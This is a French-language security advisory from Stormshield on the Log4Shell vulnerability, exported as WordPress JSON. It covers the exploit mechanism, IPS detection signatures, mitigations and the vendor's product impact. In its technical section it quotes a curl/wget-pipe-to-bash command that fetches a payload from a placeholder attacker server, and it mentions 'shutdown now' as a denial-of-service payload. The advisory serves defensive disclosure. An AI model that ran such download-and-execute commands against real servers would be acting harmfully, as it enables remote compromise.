{"id":244964,"date":"2021-12-13T17:40:02","date_gmt":"2021-12-13T16:40:02","guid":{"rendered":"https:\/\/www.stormshield.com\/?p=244964"},"modified":"2024-02-15T15:31:21","modified_gmt":"2024-02-15T14:31:21","slug":"alerte-securite-log4shell-la-reponse-des-produits-stormshield","status":"publish","type":"post","link":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/","title":{"rendered":"Alerte s\u00e9curit\u00e9 vuln\u00e9rabilit\u00e9 Zero-day Log4Shell : la r\u00e9ponse des produits Stormshield"},"content":{"rendered":"<p><strong>La d\u00e9couverte de la vuln\u00e9rabilit\u00e9 Zero-day Log4Shell a fait l\u2019effet d\u2019une bombe \u00e0 l\u2019approche des f\u00eates de fin d\u2019ann\u00e9e. Le point sur une vuln\u00e9rabilit\u00e9 critique, avec l\u2019\u00e9quipe Stormshield Customer Security Lab. Et retrouvez les impacts de cette vuln\u00e9rabilit\u00e9 Log4Shell sur les produits Stormshield en bas de page.<\/strong><\/p>\n<p>Cette vuln\u00e9rabilit\u00e9 Log4Shell inqui\u00e8te \u00e9norm\u00e9ment la communaut\u00e9 s\u00e9curit\u00e9. D\u2019une part, car elle est d\u00e9j\u00e0 exploit\u00e9e mais, d\u2019autre part, car les mises \u00e0 jour de ce type de logiciel peuvent \u00eatre longues. Tr\u00e8s longues\u2026 Certains sp\u00e9cialistes estiment qu\u2019il faudra plusieurs ann\u00e9es avant que tous les logiciels impact\u00e9s soient patch\u00e9s.<\/p>\n<p>&nbsp;<\/p>\n<h2>Le contexte de la vuln\u00e9rabilit\u00e9 Log4Shell<\/h2>\n<p>Ce 9 d\u00e9cembre 2021, une vuln\u00e9rabilit\u00e9 Zero-day de type RCE (<em>Remote Code Execution<\/em>) concernant la librairie log4j a \u00e9t\u00e9 d\u00e9couverte par Chen Zhaojun. Elle est d\u00e9sormais <strong>connue sous le nom de vuln\u00e9rabilit\u00e9 Log4Shell ou via le num\u00e9ro CVE-2021-44228<\/strong>. Cette librairie est largement utilis\u00e9e dans le framework Apache et son \u00e9cosyst\u00e8me. Son exploitation permettant la prise de contr\u00f4le \u00e0 distance du serveur, l\u2019impact de la vuln\u00e9rabilit\u00e9 est par cons\u00e9quent tr\u00e8s \u00e9lev\u00e9. \u00c0 tel point <strong>que son score CVSS est de 10<\/strong>, soit le plus \u00e9lev\u00e9 de cette \u00e9chelle de notation. Elle peut \u00eatre class\u00e9e dans une vuln\u00e9rabilit\u00e9 critique de type supply chain.<\/p>\n<p>Un POC a \u00e9t\u00e9 mis \u00e0 disposition sur GitHub d\u00e8s le 9 d\u00e9cembre, et propose par ailleurs des techniques de contournement des <em>Web Application Firewalls<\/em>.<\/p>\n<p><strong>Mise \u00e0 jour du 15\/12\/2021 avec la CVE-2021-45056 :<\/strong> une autre vuln\u00e9rabilit\u00e9 relative au module JNDI a \u00e9t\u00e9 d\u00e9couverte et permet un d\u00e9ni de service. Son score CVSS est de 3.7.<\/p>\n<p>&nbsp;<\/p>\n<h2>Les d\u00e9tails techniques de la vuln\u00e9rabilit\u00e9 Log4Shell<\/h2>\n<p>La librairie log4j permet la g\u00e9n\u00e9ration de logs pour les applications Java. Elle dispose d\u2019une fonctionnalit\u00e9 appel\u00e9e JNDI Lookup (<em>Java Naming and Directory Interface<\/em>) qui proc\u00e8de automatiquement \u00e0 l\u2019interrogation de serveur LDAP (ou autre serveur relatif \u00e0 JNDI) lorsqu\u2019une requ\u00eate sp\u00e9cifique est formul\u00e9e.<\/p>\n<p>Il est possible pour un attaquant de forger un log ou un param\u00e8tre sp\u00e9cifique, qui, lorsqu\u2019il est parcouru par le programme, conduit la fonction JNDI \u00e0 effectuer une requ\u00eate sur le serveur de l\u2019attaquant,<\/p>\n<ul>\n<li>soit pour demander l\u2019ex\u00e9cution d\u2019une commande (par exemple <em>curl -s SERVERIP:5874\/[target IP]:8080||wget -q -O- SERVERIP:5874\/[target IP]:8080)|bash<\/em>) ;<\/li>\n<li>soit ex\u00e9cuter simplement un <em>shutdown now<\/em> pour r\u00e9aliser un d\u00e9ni de service ;<\/li>\n<li>ou encore pour r\u00e9cup\u00e9rer la charge malveillante et l\u2019ex\u00e9cuter sur le serveur cible.<\/li>\n<\/ul>\n<p>Voici un sch\u00e9ma synth\u00e9tisant l\u2019exploitation de la vuln\u00e9rabilit\u00e9 Log4Shell :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-244971\" src=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/log4shell-1024x410.png\" alt=\"\" width=\"800\" height=\"320\" srcset=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/log4shell-1024x410.png 1024w, https:\/\/www.stormshield.com\/wp-content\/uploads\/log4shell-300x120.png 300w, https:\/\/www.stormshield.com\/wp-content\/uploads\/log4shell-768x307.png 768w, https:\/\/www.stormshield.com\/wp-content\/uploads\/log4shell-700x280.png 700w, https:\/\/www.stormshield.com\/wp-content\/uploads\/log4shell.png 1362w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/p>\n<h3>Versions impact\u00e9es par la CVE-2021-44228<\/h3>\n<p>Les versions concern\u00e9es sont Log4j entre la 2.0beta9 et la 2.14.1, la fonctionnalit\u00e9 de \u00ab <em>message lookup substitution<\/em> \u00bb est activ\u00e9e par d\u00e9faut. \u00c0 partir de la version 2.15, la fonctionnalit\u00e9 est d\u00e9sactiv\u00e9e par d\u00e9faut.<\/p>\n<p>Mise \u00e0 jour du 15\/12\/2021 avec la CVE-2021-45056 : <strong>la version 2.15.0 reste vuln\u00e9rable \u00e0 un d\u00e9ni de service via l\u2019utilisation du champ {ctx :}<\/strong>.<\/p>\n<p>&nbsp;<\/p>\n<h3>Logiciels impact\u00e9s par la CVE-2021-44228<\/h3>\n<p>S\u2019agissant d\u2019une vuln\u00e9rabilit\u00e9 dans une biblioth\u00e8que largement embarqu\u00e9e dans des outils \u00ab cl\u00e9 en main \u00bb, il est impossible de dresser une liste pr\u00e9cise de tous les logiciels vuln\u00e9rables. Cependant, de grands noms comme Apple, Steam, Twitter et l\u2019\u00e9diteur de Minecraft sont impact\u00e9s.<\/p>\n<p>Pour plus de d\u00e9tails, <a href=\"https:\/\/gist.github.com\/SwitHak\/b66db3a06c2955a9cb71a8718970c592\" target=\"_blank\" rel=\"noopener\">ce GitHub recense l\u2019exposition de diff\u00e9rents \u00e9diteurs \u00e0 cette vuln\u00e9rabilit\u00e9 Log4Shell<\/a>.<\/p>\n<p>&nbsp;<\/p>\n<h2>Les moyens de protection fournis par Stormshield face \u00e0 la la vuln\u00e9rabilit\u00e9 Log4Shell<\/h2>\n<h3>Protection avec Stormshield Network Security<\/h3>\n<p>Plusieurs signatures IPS ont \u00e9t\u00e9 publi\u00e9es sur les firewalls Stormshield Network Security (SNS), permettant de d\u00e9tecter et bloquer les tentatives d\u2019\u00e9criture de logs contenant une instruction JNDI, qui seraient contenues dans une en-t\u00eate HTTP ou dans le corps de la requ\u00eate. Celles-ci fonctionnent donc via l\u2019analyse du trafic HTTP, qui doit donc \u00eatre en clair lors de son inspection. Si le flux est chiffr\u00e9, le proxy SSL doit \u00eatre activ\u00e9 (flux sortant), ou alors le d\u00e9chiffrement doit se faire sur un autre \u00e9quipement en amont (flux entrant).<\/p>\n<p>Ces signatures sont :<\/p>\n<ul>\n<li><strong>http:client:header.217<\/strong> \u2192 Log4j2 RCE attempt using JNDI on HTTP header (CVE-2021-44228)<\/li>\n<li><strong>http:client:data.160<\/strong> \u2192 Log4j2 RCE attempt using JNDI on HTTP POST request (CVE-2021-44228)<\/li>\n<\/ul>\n<p>Mise \u00e0 jour du 15\/12\/2021 avec la CVE-2021-45056 : suite \u00e0 la communication Apache, deux nouvelles signatures ont \u00e9t\u00e9 publi\u00e9es permettant de pr\u00e9venir d\u2019une nouvelle exploitation. Il s\u2019agit de :<\/p>\n<ul>\n<li><strong>http:client:header.218<\/strong> \u2192 DoS attempt on a Log4j2 service using malicious HTTP header (CVE-2021-45056)<\/li>\n<li><strong>http:client:data.161<\/strong> \u2192 DoS attempt on a Log4j2 service using malicious HTTP POST request (CVE-2021-45056)<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-233125 aligncenter\" src=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/indice-3.png\" alt=\"\" width=\"67\" height=\"50\" \/><\/p>\n<p style=\"text-align: center;\">Indice de confiance de la protection propos\u00e9e par Stormshield<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-244967\" src=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/indice-de-confiance-medium-low.png\" alt=\"\" width=\"67\" height=\"50\" \/><\/p>\n<p style=\"text-align: center;\">Indice de confiance de l\u2019absence de faux positif<\/p>\n<h3>Protection avec Stormshield Endpoint Security<\/h3>\n<p>Les diff\u00e9rentes versions de SES (7.2 et Evolution) \u00e9tant des solutions de protection de postes et serveurs, elles ne vont pas bloquer l\u2019exploitation de cette vuln\u00e9rabilit\u00e9 Log4Shell directement. Par contre, elles pourront emp\u00eacher le payload de s\u2019ex\u00e9cuter correctement et ainsi \u00e9viter tout impact. Le blocage d\u00e9pendra du payload utilis\u00e9.<\/p>\n<p>&nbsp;<\/p>\n<h3>Recommandations face \u00e0 la vuln\u00e9rabilit\u00e9 Log4Shell<\/h3>\n<p>La premi\u00e8re recommandation est la <strong>mise \u00e0 jour de log4j en version 2.16<\/strong>.<\/p>\n<p>Si cela n\u2019est pas possible, il faut supprimer la classe JndiLookup du fichier .jar core : <em>zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class<\/em>.<\/p>\n<p>&nbsp;<\/p>\n<h2>Les impacts de la vuln\u00e9rabilit\u00e9 Log4Shell sur les produits Stormshield<\/h2>\n<p>L\u2019\u00e9tude d\u2019impact a \u00e9t\u00e9 men\u00e9e sur l\u2019ensemble de la gamme de produit Stormshield, incluant les services SaaS, donc voici le r\u00e9sultat.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-245080\" src=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/stormshield-products-v11-1024x348.jpg\" alt=\"\" width=\"800\" height=\"272\" srcset=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/stormshield-products-v11-1024x348.jpg 1024w, https:\/\/www.stormshield.com\/wp-content\/uploads\/stormshield-products-v11-300x102.jpg 300w, https:\/\/www.stormshield.com\/wp-content\/uploads\/stormshield-products-v11-768x261.jpg 768w, https:\/\/www.stormshield.com\/wp-content\/uploads\/stormshield-products-v11-700x238.jpg 700w, https:\/\/www.stormshield.com\/wp-content\/uploads\/stormshield-products-v11.jpg 1072w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/p>\n<p>Seule la solution SVC en version 1.6 est vuln\u00e9rable. Un contournement est propos\u00e9 <a href=\"https:\/\/advisories.stormshield.eu\/3347\/\" target=\"_blank\" rel=\"noopener\">sur notre site Advisories<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>La d\u00e9couverte de la vuln\u00e9rabilit\u00e9 Zero-day Log4Shell a fait l\u2019effet d\u2019une bombe \u00e0 l\u2019approche des f\u00eates de fin d\u2019ann\u00e9e. Le point sur une vuln\u00e9rabilit\u00e9 critique, avec l\u2019\u00e9quipe Stormshield Customer Security Lab. Et retrouvez les impacts de cette vuln\u00e9rabilit\u00e9 Log4Shell sur les produits Stormshield en bas&#8230;<\/p>\n","protected":false},"author":65,"featured_media":190179,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1503],"tags":[4368],"business_size":[],"industry":[],"help_mefind":[],"features":[],"type_security":[],"maintenance":[],"offer":[],"administration_tools":[],"cloud_offers":[],"listing_product":[1565,1530],"class_list":["post-244964","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-alertes","tag-la-cybersecurite-par-stormshield","listing_product-ses-fr","listing_product-sns-fr"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Vuln\u00e9rabilit\u00e9 Log4Shell, protections avec les solutions Stormshield<\/title>\n<meta name=\"description\" content=\"CVE-2021-44228 : le point sur les protections Stormshield pour faire face \u00e0 une vuln\u00e9rabilit\u00e9 Zero-day Log4Shell. Score CVSS : 10.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Vuln\u00e9rabilit\u00e9 Log4Shell, protections avec les solutions Stormshield\" \/>\n<meta property=\"og:description\" content=\"CVE-2021-44228 : le point sur les protections Stormshield pour faire face \u00e0 une vuln\u00e9rabilit\u00e9 Zero-day Log4Shell. Score CVSS : 10.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/\" \/>\n<meta property=\"og:site_name\" content=\"Stormshield\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-13T16:40:02+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-15T14:31:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock_1534485395-scaled.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1422\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Pierre-Olivier Kaplan\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:site\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Pierre-Olivier Kaplan\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/\"},\"author\":{\"name\":\"Pierre-Olivier Kaplan\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/9ab97406c59f09f701a9c5174c3f552f\"},\"headline\":\"Alerte s\u00e9curit\u00e9 vuln\u00e9rabilit\u00e9 Zero-day Log4Shell : la r\u00e9ponse des produits Stormshield\",\"datePublished\":\"2021-12-13T16:40:02+00:00\",\"dateModified\":\"2024-02-15T14:31:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/\"},\"wordCount\":1025,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock_1534485395-scaled.jpg\",\"keywords\":[\"La cybers\u00e9curit\u00e9 - par Stormshield\"],\"articleSection\":[\"Alertes\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/\",\"name\":\"Vuln\u00e9rabilit\u00e9 Log4Shell, protections avec les solutions Stormshield\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock_1534485395-scaled.jpg\",\"datePublished\":\"2021-12-13T16:40:02+00:00\",\"dateModified\":\"2024-02-15T14:31:21+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/9ab97406c59f09f701a9c5174c3f552f\"},\"description\":\"CVE-2021-44228 : le point sur les protections Stormshield pour faire face \u00e0 une vuln\u00e9rabilit\u00e9 Zero-day Log4Shell. Score CVSS : 10.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock_1534485395-scaled.jpg\",\"contentUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock_1534485395-scaled.jpg\",\"width\":2560,\"height\":1422},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Alerte s\u00e9curit\u00e9 vuln\u00e9rabilit\u00e9 Zero-day Log4Shell : la r\u00e9ponse des produits Stormshield\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/\",\"name\":\"Stormshield\",\"description\":\"Stormshield\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/9ab97406c59f09f701a9c5174c3f552f\",\"name\":\"Pierre-Olivier Kaplan\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/581086a18f7de7a0ab389d44f817db4843ba44e9ba379a7f643b5e54fbada438?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/581086a18f7de7a0ab389d44f817db4843ba44e9ba379a7f643b5e54fbada438?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/581086a18f7de7a0ab389d44f817db4843ba44e9ba379a7f643b5e54fbada438?s=96&d=mm&r=g\",\"caption\":\"Pierre-Olivier Kaplan\"},\"description\":\"Pierre-Olivier wears many hats in the game world, alternating between game-designer and rogue. Passionate about history and computer security, he specialised in the latter after graduating from EPITA and joined the ranks of Stormshield. IRL, he eats anything with a hummus base, ideal to be in top shape and tackle the latest cyber threats.\",\"sameAs\":[\"https:\\\/\\\/www.linkedin.com\\\/in\\\/pierre-olivier-kaplan-53254191\\\/\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Vuln\u00e9rabilit\u00e9 Log4Shell, protections avec les solutions Stormshield","description":"CVE-2021-44228 : le point sur les protections Stormshield pour faire face \u00e0 une vuln\u00e9rabilit\u00e9 Zero-day Log4Shell. Score CVSS : 10.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/","og_locale":"fr_FR","og_type":"article","og_title":"Vuln\u00e9rabilit\u00e9 Log4Shell, protections avec les solutions Stormshield","og_description":"CVE-2021-44228 : le point sur les protections Stormshield pour faire face \u00e0 une vuln\u00e9rabilit\u00e9 Zero-day Log4Shell. Score CVSS : 10.","og_url":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/","og_site_name":"Stormshield","article_published_time":"2021-12-13T16:40:02+00:00","article_modified_time":"2024-02-15T14:31:21+00:00","og_image":[{"width":2560,"height":1422,"url":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock_1534485395-scaled.jpg","type":"image\/jpeg"}],"author":"Pierre-Olivier Kaplan","twitter_card":"summary_large_image","twitter_creator":"@Stormshield","twitter_site":"@Stormshield","twitter_misc":{"\u00c9crit par":"Pierre-Olivier Kaplan","Dur\u00e9e de lecture estim\u00e9e":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/#article","isPartOf":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/"},"author":{"name":"Pierre-Olivier Kaplan","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/9ab97406c59f09f701a9c5174c3f552f"},"headline":"Alerte s\u00e9curit\u00e9 vuln\u00e9rabilit\u00e9 Zero-day Log4Shell : la r\u00e9ponse des produits Stormshield","datePublished":"2021-12-13T16:40:02+00:00","dateModified":"2024-02-15T14:31:21+00:00","mainEntityOfPage":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/"},"wordCount":1025,"commentCount":0,"image":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/#primaryimage"},"thumbnailUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock_1534485395-scaled.jpg","keywords":["La cybers\u00e9curit\u00e9 - par Stormshield"],"articleSection":["Alertes"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/","url":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/","name":"Vuln\u00e9rabilit\u00e9 Log4Shell, protections avec les solutions Stormshield","isPartOf":{"@id":"https:\/\/www.stormshield.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/#primaryimage"},"image":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/#primaryimage"},"thumbnailUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock_1534485395-scaled.jpg","datePublished":"2021-12-13T16:40:02+00:00","dateModified":"2024-02-15T14:31:21+00:00","author":{"@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/9ab97406c59f09f701a9c5174c3f552f"},"description":"CVE-2021-44228 : le point sur les protections Stormshield pour faire face \u00e0 une vuln\u00e9rabilit\u00e9 Zero-day Log4Shell. Score CVSS : 10.","breadcrumb":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/#primaryimage","url":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock_1534485395-scaled.jpg","contentUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock_1534485395-scaled.jpg","width":2560,"height":1422},{"@type":"BreadcrumbList","@id":"https:\/\/www.stormshield.com\/fr\/actus\/alerte-securite-log4shell-la-reponse-des-produits-stormshield\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.stormshield.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Alerte s\u00e9curit\u00e9 vuln\u00e9rabilit\u00e9 Zero-day Log4Shell : la r\u00e9ponse des produits Stormshield"}]},{"@type":"WebSite","@id":"https:\/\/www.stormshield.com\/fr\/#website","url":"https:\/\/www.stormshield.com\/fr\/","name":"Stormshield","description":"Stormshield","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.stormshield.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/9ab97406c59f09f701a9c5174c3f552f","name":"Pierre-Olivier Kaplan","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/581086a18f7de7a0ab389d44f817db4843ba44e9ba379a7f643b5e54fbada438?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/581086a18f7de7a0ab389d44f817db4843ba44e9ba379a7f643b5e54fbada438?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/581086a18f7de7a0ab389d44f817db4843ba44e9ba379a7f643b5e54fbada438?s=96&d=mm&r=g","caption":"Pierre-Olivier Kaplan"},"description":"Pierre-Olivier wears many hats in the game world, alternating between game-designer and rogue. Passionate about history and computer security, he specialised in the latter after graduating from EPITA and joined the ranks of Stormshield. IRL, he eats anything with a hummus base, ideal to be in top shape and tackle the latest cyber threats.","sameAs":["https:\/\/www.linkedin.com\/in\/pierre-olivier-kaplan-53254191\/"]}]}},"_links":{"self":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/244964","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/users\/65"}],"replies":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/comments?post=244964"}],"version-history":[{"count":11,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/244964\/revisions"}],"predecessor-version":[{"id":493417,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/244964\/revisions\/493417"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/media\/190179"}],"wp:attachment":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/media?parent=244964"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/categories?post=244964"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/tags?post=244964"},{"taxonomy":"business_size","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/business_size?post=244964"},{"taxonomy":"industry","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/industry?post=244964"},{"taxonomy":"help_mefind","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/help_mefind?post=244964"},{"taxonomy":"features","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/features?post=244964"},{"taxonomy":"type_security","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/type_security?post=244964"},{"taxonomy":"maintenance","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/maintenance?post=244964"},{"taxonom